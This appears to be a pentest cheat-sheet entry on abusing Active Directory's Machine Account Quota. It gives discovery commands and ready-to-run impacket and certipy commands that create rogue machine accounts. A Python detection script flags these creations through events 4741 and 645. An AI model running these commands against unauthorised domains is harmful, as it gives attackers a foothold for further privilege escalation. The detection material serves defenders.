Overview
By default, every authenticated domain user can join up to 10 machines to the domain. This limit is defined by the MAQ (Machine Account Quota), the ms-DS-MachineAccountQuota attribute on the domain object. There are a couple of ways to check it; for the technique below it needs to be 1 or more.
Discovery
# Checking the MAQ on a domain-joined Windows machine
Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'
# Checking MAQ remotely
nxc ldap [IP] -d [DOMAIN] -u [USER] -p [PASSWORD] -M maq # netexec
bloodyad -d [DOMAIN] -u [USER] -p [PASSWORD] --host [IP] get object 'DC=[DOMAIN],DC=[DOMAIN]' --attr ms-DS-MachineAccountQuota # bloodyAD
Exploitation
If the MAQ is greater than 0, you can create a new machine account on the domain.
# Using impacket
impacket-addcomputer -computer-name '[COMPUTER NAME]$' -computer-pass 'Password123!' -dc-host [IP] -domain-netbios [DOMAIN] '[DOMAIN]/[USER]:[PASSWORD]'
# Using certipy
certipy-ad account create -u "[USERNAME]@[DOMAIN]" -p '[PASSWORD]' -user "[COMPUTER NAME]" -pass 'Password123!' -dns "[HOSTNAME].[DOMAIN]" -dc-ip [IP]
Detection & Evasion
Events 4741(S): A computer account was created, and 645: Computer Account Created (the legacy event ID), are generated when a machine account is created. These events record the name of the created machine account and the account that created it, so a single low-privileged user creating one or more machine accounts stands out.
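As an added example (not part of the original note), a small Python script that runs this detection over constructed 4741 event records: it keeps only machine-account creations, flags any creator not on an assumed allow-list of provisioning accounts, and groups results by creator so one user standing up several accounts is obvious. The field names mirror the 4741 event data (SubjectUserName, TargetUserName); the sample events, the CORP domain and the allow-list are constructed.

```python
from collections import Counter

# Constructed sample events shaped like Security log event 4741 data:
# Subject* = who created the account, TargetUserName = the new machine account.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "svc-sccm", "SubjectDomainName": "CORP",
     "TargetUserName": "WS-FIN-042$", "TimeCreated": "2024-05-02T09:12:00"},
    {"EventID": 4741, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "TargetUserName": "DESKTOP-X1$", "TimeCreated": "2024-05-02T22:41:10"},
    {"EventID": 4741, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "TargetUserName": "DESKTOP-X2$", "TimeCreated": "2024-05-02T22:41:12"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "TargetUserName": "jdoe", "TimeCreated": "2024-05-02T22:40:00"},  # not a creation
]

# Assumed allow-list of principals expected to create machine accounts
# (in practice: imaging/MDT/SCCM service accounts and domain admins).
EXPECTED_CREATORS = {"CORP\\svc-sccm"}


def machine_account_creations(events):
    """Keep only 4741 (and legacy 645) events; return (creator, machine, time) tuples."""
    out = []
    for e in events:
        if e.get("EventID") in (4741, 645):
            creator = f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}'
            out.append((creator, e["TargetUserName"], e["TimeCreated"]))
    return out


def flag_unexpected_creators(events, expected=EXPECTED_CREATORS):
    """Map each creator not on the allow-list to the machine accounts it created.

    Grouping by creator means a user abusing the MAQ to stand up several
    accounts appears as one alert listing every machine name."""
    alerts = {}
    for creator, machine, _ in machine_account_creations(events):
        if creator not in expected:
            alerts.setdefault(creator, []).append(machine)
    return alerts


def creations_per_creator(events):
    """Count machine accounts created per principal, for comparison against the MAQ."""
    return Counter(creator for creator, _, _ in machine_account_creations(events))


if __name__ == "__main__":
    for creator, machines in flag_unexpected_creators(SAMPLE_EVENTS).items():
        print(f"ALERT: {creator} created {len(machines)} machine account(s): {', '.join(machines)}")
```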